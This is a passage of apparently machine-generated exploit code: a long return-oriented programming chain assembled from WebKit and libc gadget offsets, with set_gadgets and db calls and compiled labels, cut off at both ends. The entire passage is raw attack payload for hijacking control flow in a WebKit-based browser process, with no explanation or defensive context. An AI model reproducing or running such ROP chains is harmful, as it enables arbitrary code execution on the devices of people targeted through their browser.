webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+107400, //L1073
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1072:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1073:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+107488, //L1075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1075:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+107544, //L1076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1076:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+107616, //L1079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1079:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+107672, //L1080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1080:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1082:
libc_base+763368, //pop rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+107808, //L1083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1083:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1085:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+107928, //L1088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+107912, //L1086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1086:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1088:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+108072, //L1091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+108040, //L1089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+108056, //L1090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1089:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1090:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1091:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+108144, //L1093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1093:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+108200, //L1094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1094:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+108296, //L1097
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1096:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1097:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1098:
db([21, 0]); // 0x15
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+108392, //L1099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+108408, //L1100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1099:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1100:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+108496, //L1102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1102:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+108552, //L1103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1103:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+108624, //L1106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1106:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+108680, //L1107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1107:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+108768, //L1109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1109:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1111:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+108888, //L1114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+108872, //L1112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1112:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1114:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+109032, //L1117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+109000, //L1115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+109016, //L1116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1115:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1116:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1117:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+109104, //L1119
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1119:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+109160, //L1120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1120:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+109256, //L1123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1122:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1123:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1124:
db([6, 0]); // 0x6
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+109352, //L1125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+109368, //L1126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1125:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1126:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+109456, //L1128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1128:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+109512, //L1129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1129:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+109616, //L1131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1131:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1133:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+109736, //L1136
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+109720, //L1134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1134:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1136:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+109880, //L1139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+109848, //L1137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+109864, //L1138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1137:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1138:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1139:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+109952, //L1141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1141:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+110008, //L1142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1142:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+110104, //L1145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1144:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1145:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1146:
db([22, 0]); // 0x16
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+110200, //L1147
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+110216, //L1148
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1147:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1148:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+110304, //L1150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1150:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+110360, //L1151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1151:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+110432, //L1154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1154:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+110488, //L1155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1155:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1157:
libc_base+533450, //mov [rcx], rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+110624, //L1158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1158:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1160:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+110744, //L1163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+110728, //L1161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1161:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1163:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+110888, //L1166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+110856, //L1164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+110872, //L1165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1164:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1165:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1166:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+110960, //L1168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1168:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+111016, //L1169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1169:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+111112, //L1172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1171:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1172:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1173:
db([23, 0]); // 0x17
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+111208, //L1174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+111224, //L1175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1174:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1175:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+111312, //L1177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1177:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+111368, //L1178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1178:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+111440, //L1181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1181:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+111496, //L1182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1182:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1184:
libc_base+144605, //pop rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+111632, //L1185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1185:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1187:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+111752, //L1190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+111736, //L1188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1188:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1190:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+111896, //L1193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+111864, //L1191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+111880, //L1192
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1191:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1192:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1193:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+111968, //L1195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1195:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+112024, //L1196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1196:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+112120, //L1199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1198:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1199:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1200:
db([24, 0]); // 0x18
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+112216, //L1201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+112232, //L1202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1201:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1202:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+112320, //L1204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1204:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+112376, //L1205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1205:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+112448, //L1208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1208:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+112504, //L1209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1209:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+112592, //L1211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1211:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1213:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+112712, //L1216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+112696, //L1214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1214:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1216:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+112856, //L1219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+112824, //L1217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+112840, //L1218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1217:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1218:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1219:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+112928, //L1221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1221:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+112984, //L1222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1222:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+113080, //L1225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1224:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1225:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1226:
db([2, 0]); // 0x2
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+113176, //L1227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+113192, //L1228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1227:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1228:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
